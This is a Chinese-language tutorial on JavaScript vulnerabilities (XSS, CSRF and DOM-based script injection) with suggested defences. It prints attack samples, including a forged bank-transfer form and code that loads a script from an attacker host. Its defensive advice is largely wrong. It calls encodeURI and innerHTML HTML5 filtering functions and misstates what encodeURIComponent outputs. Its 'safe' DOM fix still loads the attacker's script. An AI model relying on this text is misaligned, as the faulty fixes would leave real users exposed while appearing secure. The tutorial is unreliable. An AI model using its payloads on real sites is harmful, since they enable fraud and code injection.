JavaScript是一種廣泛使用的腳本編程語言，是網頁設計必不可少的元素之一。然而，JavaScript代碼存在著一些漏洞，這些漏洞往往會被攻擊者利用來入侵網站，竊取敏感信息甚至干擾正常的網站功能。

JavaScript漏洞的種類繁多，下面舉幾個例子。第一個例子是XSS漏洞，即跨站腳本漏洞。攻擊者通過在網站提交評論或消息中插入惡意的腳本代碼，來竊取用戶的Cookie等敏感信息。代碼示例如下：

<script>
document.cookie = "user_id=" + user_id;
</script>

第二個例子是CSRF漏洞，即跨站請求偽造漏洞。攻擊者通過偽造用戶的請求，在不知情的情況下進行一些敏感操作，如修改密碼、轉賬等。代碼示例如下：

<form action="http://bank.com/transfer" method="POST">
<input type="hidden" name="to" value="attacker_account">
<input type="hidden" name="amount" value="1000000">
<input type="submit" value="transfer">
</form>

第三個例子是DOM漏洞，即Document Object Model漏洞。攻擊者通過篡改網頁中的DOM節點，來修改網頁的顯示內容或執行惡意操作。代碼示例如下：

var tag = document.createElement("script");
tag.src = "http://attacker.com/malicious.js";
document.getElementsByTagName("head")[0].appendChild(tag);

以上只是JavaScript漏洞的冰山一角，還有許多其他的漏洞類型。在實際開發中，應該盡可能地避免這些漏洞的出現。下面列舉一些防范JavaScript漏洞的方法。

首先，對于XSS漏洞，可以對用戶提交的內容進行過濾和轉義。 HTML5提供了很多新的過濾函數，如encodeURI、encodeURIComponent、innerHTML等。使用這些函數可以保證用戶輸入的內容不會被當成HTML代碼執行。代碼示例如下：

var user_input = "<script>alert('hello world')</script>";
var safe_input = encodeURIComponent(user_input);
document.write(safe_input); //輸出 &lt;script&gt;alert('hello world')&lt;/script&gt;

其次，對于CSRF漏洞，可以使用隨機的Token來驗證請求的合法性。服務器在生成頁面時隨機生成一個Token值，并將其嵌入到表單中或頁面URL中。當用戶提交請求時，服務器驗證該Token值是否正確。代碼示例如下：

<form action="http://bank.com/transfer" method="POST">
<input type="hidden" name="to" value="user_account">
<input type="hidden" name="amount" value="100">
<input type="hidden" name="csrf_token" value="random_string">
<input type="submit" value="transfer">
</form>
//服務器驗證代碼
if(request.POST["csrf_token"] != session.get("csrf_token")):
raise Exception("Invalid CSRF Token")

最后，對于DOM漏洞，可以避免直接動態構建JavaScript代碼或使用innerHTML等方法來修改DOM。應該使用DOM API來進行操作，同時避免數據不受信任的參數傳遞。代碼示例如下：

var tag = document.createElement("script");
tag.src = "http://attacker.com/malicious.js";
document.getElementsByTagName("head")[0].appendChild(tag);
//替換為安全的代碼
var tag = document.createElement("script");
tag.setAttribute("src", "http://attacker.com/malicious.js");
document.getElementsByTagName("head")[0].appendChild(tag);

在實際開發中，避免JavaScript漏洞的出現需要多方面的考慮，包括代碼質量、開發過程管理等。只有始終保持警覺，才能為用戶提供更加安全的應用程序。